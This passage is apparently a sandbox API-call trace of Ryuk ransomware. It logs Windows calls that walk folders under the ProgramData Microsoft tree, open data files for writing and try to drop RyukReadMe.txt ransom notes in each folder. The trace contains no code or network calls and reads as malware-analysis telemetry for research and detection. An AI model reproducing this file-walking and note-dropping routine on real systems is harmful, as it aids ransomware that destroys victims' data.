returned 0x5 [0159.597] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.597] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.597] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.597] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.597] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.597] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.598] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", dwFileAttributes=0x80) returned 0 [0159.598] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.598] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.598] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.598] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.598] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.598] SetLastError (dwErrCode=0x0) [0159.598] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.598] GetLastError () returned 0x5 [0159.598] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.598] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.598] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.598] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.599] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", dwFileAttributes=0x80) returned 0 [0159.599] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.599] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.599] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.599] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.599] SetLastError (dwErrCode=0x0) [0159.599] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.599] GetLastError () returned 0x5 [0159.599] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.599] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.599] SetLastError (dwErrCode=0x0) [0159.599] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.600] GetLastError () returned 0x5 [0159.600] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.600] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.600] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.600] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.600] SetLastError (dwErrCode=0x0) [0159.600] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.600] GetLastError () returned 0x5 [0159.600] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.600] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.600] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.600] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.600] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.600] SetLastError (dwErrCode=0x0) [0159.601] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\outbound\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.601] GetLastError () returned 0x5 [0159.601] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.601] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.601] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.601] SetLastError (dwErrCode=0x0) [0159.601] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.601] GetLastError () returned 0x5 [0159.601] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.601] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.601] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.601] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.601] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.601] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", dwFileAttributes=0x80) returned 1 [0159.602] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.602] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.602] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.602] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.602] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.602] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.602] SetLastError (dwErrCode=0x0) [0159.602] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.602] GetLastError () returned 0xb7 [0159.602] CloseHandle (hObject=0x18c) returned 1 [0159.602] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.602] SetLastError (dwErrCode=0x0) [0159.602] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.602] GetLastError () returned 0x5 [0159.602] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.603] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.603] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.603] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.603] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", dwFileAttributes=0x80) returned 0 [0159.603] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.603] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.603] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.604] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat", dwFileAttributes=0x80) returned 0 [0159.604] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.604] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.604] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.604] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.604] SetLastError (dwErrCode=0x0) [0159.604] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.604] GetLastError () returned 0x5 [0159.604] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.604] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.604] SetLastError (dwErrCode=0x0) [0159.604] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.604] GetLastError () returned 0x5 [0159.604] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.605] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.605] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.605] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.605] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.605] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.605] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.605] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql4826.tmp", dwFileAttributes=0x80) returned 0 [0159.605] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql4826.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql4826.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.605] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.605] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.605] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.605] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.606] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql4846.tmp", dwFileAttributes=0x80) returned 1 [0159.606] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql4846.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql4846.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.606] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.606] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.606] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.606] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.606] SetLastError (dwErrCode=0x0) [0159.606] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.606] GetLastError () returned 0xb7 [0159.606] CloseHandle (hObject=0x18c) returned 1 [0159.606] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.606] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.606] SetLastError (dwErrCode=0x0) [0159.607] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.607] GetLastError () returned 0x5 [0159.607] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.607] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.607] SetLastError (dwErrCode=0x0) [0159.607] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.607] GetLastError () returned 0x5 [0159.607] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.607] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.607] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.607] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.607] SetLastError (dwErrCode=0x0) [0159.607] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.607] GetLastError () returned 0x5 [0159.608] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.608] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0159.608] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.608] SetLastError (dwErrCode=0x0) [0159.608] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.608] GetLastError () returned 0x5 [0159.608] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.608] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.608] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.608] SetLastError (dwErrCode=0x0) [0159.608] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.608] GetLastError () returned 0x5 [0159.608] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.608] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.608] SetLastError (dwErrCode=0x0) [0159.608] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.609] GetLastError () returned 0x5 [0159.609] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.609] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.609] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.609] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.609] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.609] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat", dwFileAttributes=0x80) returned 1 [0159.610] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.610] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=0) returned 1 [0159.610] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=0) returned 1 [0159.610] CloseHandle (hObject=0x18c) returned 1 [0159.610] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.610] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.610] SetLastError (dwErrCode=0x0) [0159.610] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.610] GetLastError () returned 0x5 [0159.610] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.610] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.611] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.611] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.611] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.611] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.612] 